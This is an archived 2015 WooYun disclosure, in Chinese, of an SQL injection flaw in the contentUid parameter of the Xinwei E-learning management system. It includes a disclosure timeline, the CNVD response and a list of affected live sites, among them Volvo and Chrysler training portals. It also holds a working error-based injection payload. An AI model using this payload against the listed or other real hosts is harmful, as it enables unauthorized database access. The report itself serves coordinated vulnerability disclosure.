新为通用E-learning管理系统SQL注入漏洞

漏洞概要

缺陷编号:WooYun-2015-0127104

漏洞标题:新为通用E-learning管理系统SQL注入漏洞

相关厂商:新为软件

漏洞作者:路人甲

提交时间:2015-07-18 11:07

公开时间:2015-10-19 08:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2015-07-18: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-14: 细节向核心白帽子及相关领域专家公开
2015-09-24: 细节向普通白帽子公开
2015-10-04: 细节向实习白帽子公开
2015-10-19: 细节向公众公开

简要描述:

影响力其实很大

详细说明:

新为软件E-learning管理系统,使用的企业挺多的官网部分列表:企业:http://**.**.**.**/case_enterprise.html教育:http://**.**.**.**/case_college.html政府:http://**.**.**.**/case_government.html问题主要出在:/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1contentUid参数过滤不严导致SQL注射案例比较多:http://volvo.infolearning.so/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 沃尔沃汽车网络学院http://chrysler.infolearning.so/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 克莱斯勒汽车网络学院**.**.**.**:65000//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1 艾普宽带http://**.**.**.**/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**/kl/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1**.**.**.**:8088//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1**.**.**.**//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**/gsedu_admin//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1**.**.**.**:9999/cloud//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1**.**.**.**//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1**.**.**.**//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1**.**.**.**//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**:8080//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1**.**.**.**:89//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**:8080//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1**.**.**.**:8080//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1**.**.**.**:8888//bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1http://**.**.**.**/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1

漏洞证明:

http://**.**.**.**/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1%27%2b+(select+convert(int%2c(CHAR(@@version)%2bCHAR(79)))+FROM+syscolumns)+%2b%27

http://chrysler.infolearning.so/bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=1

9个库我就不跑了

修复方案:

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-07-2108:28

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系渠道向软件生产厂商通报(销售邮箱),由其后续协调处置。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 cuger 白帽子 | Rank:133 漏洞数:14)

    还是有人提交这个软件的漏洞了。。。。

  2. 2010-01-01 00:00 ..%2Fcorps%2F腾讯 白帽子 | Rank:0 漏洞数:0)

    @finger 这系统程序我们打的头炮第一个提交还是首页,奖金是不是会比后期提交的高点呢?